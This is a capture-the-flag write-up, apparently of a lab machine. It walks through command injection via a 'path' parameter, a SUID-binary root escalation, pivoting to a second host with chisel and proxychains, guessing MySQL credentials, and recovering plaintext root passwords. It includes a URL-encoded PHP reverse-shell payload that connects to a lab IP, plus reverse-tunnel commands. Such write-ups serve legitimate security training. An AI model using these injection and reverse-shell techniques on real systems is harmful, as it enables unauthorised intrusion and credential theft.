Where am I ? Catch me
We have a default apache2 page:
We can enumerate this further and see what else we can find:
is exactly what it sounds, it’s the php info page:
This discloses a little information about our current environment. Let’s check index.php too:
This looks to give us the contents of our current path. Let’s try adding a path?= parameter to this:
We can assume this is this is passing the content of the path
argument to a system call, we can try adding extra commands to this:
We successfully have RCE, let’s get ourselves a shell:;php%20-r%20%27$sock=fsockopen(%2210.13.28.182%22,4443);$proc=proc_open(%22sh%22,%20array(0=%3E$sock,%201=%3E$sock,%202=%3E$sock),$pipes);%27
Root own #1
We can execute the a binary in mike’s home directory:
The binary at first glance doesn’t do a great deal but print a banner. If we look at the running processes, we see this binary again:
We have a SSUID binary, passing an argument to this gives us a message:
Trying mike instead, instantly gives us root.
Root own 2
We have a couple other interfaces we can enumerate. Let’s start by getting a few static binaries across to the box:
We’re also going to need nmap (or netcat w/ a bash script). We can do a ping sweep and find a second host ( It has SSH open on it, let’s try using one of the private keys on the box:
Still no flag and we’re on a 172 range, not the main box (or have an IP address on a 10. range). This felt like a bit of a dead-end so I took a step back. We can forward port 22 on that second host over to ourselves using chisel, which is going to make further interactions a lot easier:
local: ./chisel server -p 8001 --reverse
remote: ./chisel client R:socks
Finally, we add a proxy for this in our proxychains.conf file:
socks5 1080
We do have mysql running on this box:
We have no credentials for this but we can try some common passwords with the usernames we’ve already got and get the credentials mike:password
We have a database called accounts containing credentials for root:
These aren’t hashed (luckily) and allow us to swap over to root.
We have one last thing to do, we have a password protected zip file, I assume contains the flag we need:
We only have a couple passwords for mike, using the ones we have from the database unzip the file and give us the flag.